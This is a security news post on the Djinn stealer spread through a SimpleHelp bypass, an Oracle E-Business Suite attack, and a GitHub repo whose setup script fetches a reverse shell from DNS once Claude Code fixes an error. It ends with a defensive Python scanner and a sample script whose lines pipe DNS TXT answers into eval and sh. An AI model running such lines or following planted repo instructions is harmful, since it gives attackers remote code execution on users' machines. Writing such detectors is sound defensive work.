Attackers are exploiting CVE-2026-48558, a recently patched authentication bypass vulnerability in SimpleHelp’s remote monitoring and management software, to plant a new stealer called Djinn. It doesn’t just grab browser passwords; it hunts credentials for cloud consoles, source control, package registries, infrastructure tooling, and AI coding assistants.

For any small team running SimpleHelp as their MSP’s remote-access tool, that’s not an abstract risk. One compromised RMM box means resetting every credential it touched, and if Djinn got your AI assistant’s tokens too, that’s your CI pipeline and your model API keys in the reset pile. Figure a few days of engineering time just on credential rotation, before anyone’s even looked at what got exfiltrated.

Oracle’s E-Business Suite Payments module got hit the same week. Defused’s honeypots caught the first live attack on June 27, six weeks after Oracle’s patch and before any public exploit code existed, meaning someone weaponized it privately first. Both bugs were patched back in May. The gap between patch release and attacker use keeps shrinking, and that gap is the real metric for your vulnerability management calendar, not the CVSS score.

Mozilla’s 0DIN team added a third wrinkle: a GitHub repo that contains no malicious code at all, just a setup script that fetches a reverse shell from a DNS record once Claude Code tries to fix a routine error. Treat every unfamiliar repo’s setup instructions as untrusted, no matter what your agent recommends.
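
A pre-run check in that spirit, as an added example that is not from 0DIN's report or this post's sources: it flags POSIX shell setup scripts in which a DNS answer reaches an interpreter, directly or through a variable. The tool names, sink patterns and sample script are assumptions constructed for illustration.

```python
import re

# Assumed patterns (not from the report): DNS tools in command position, and
# shell constructs that execute their input.
DNS_LOOKUP = re.compile(r"(?:^|[\s(`|;&])(?:dig|nslookup|host|drill)\s")
EXEC_SINK = re.compile(
    r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b|\beval\b|\b(?:ba|z|da)?sh\s+-c\b"
    r"|\bsource\b|\bpython3?\s+-c\b")
ASSIGN = re.compile(r"^(?:export\s+)?([A-Za-z_]\w*)=")

def audit_setup_script(text):
    """Return (line_no, reason, line) where DNS-derived data reaches an interpreter."""
    findings, tainted = [], set()  # tainted: variables holding DNS answers
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        has_dns = bool(DNS_LOOKUP.search(line))
        used = sorted(v for v in tainted
                      if re.search(r"\$\{?" + re.escape(v) + r"\b", line))
        if EXEC_SINK.search(line):
            if has_dns:
                findings.append((no, "DNS answer executed directly", line))
            elif used:
                findings.append((no, "DNS-derived variable executed: " + ",".join(used), line))
        m = ASSIGN.match(line)
        if m:  # taint follows reassignment; a clean assignment clears it
            (tainted.add if has_dns or used else tainted.discard)(m.group(1))
    return findings

# Constructed sample script, not the repository from the report.
SAMPLE = """#!/bin/sh
pip install -r requirements.txt
host=build.example.invalid
cfg=$(dig +short TXT cfg.example.invalid | tr -d '"')
step="$cfg"
echo "configuring for $host"
eval "$step"
nslookup -type=TXT boot.example.invalid | tail -n 1 | sh
"""

if __name__ == "__main__":
    for no, reason, line in audit_setup_script(SAMPLE):
        print(f"line {no}: {reason}: {line}")
```

This is a line-based heuristic: a hit is a reason to stop and read the script before anything runs it, and an empty result does not show the script is safe.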

Nathan Zakhary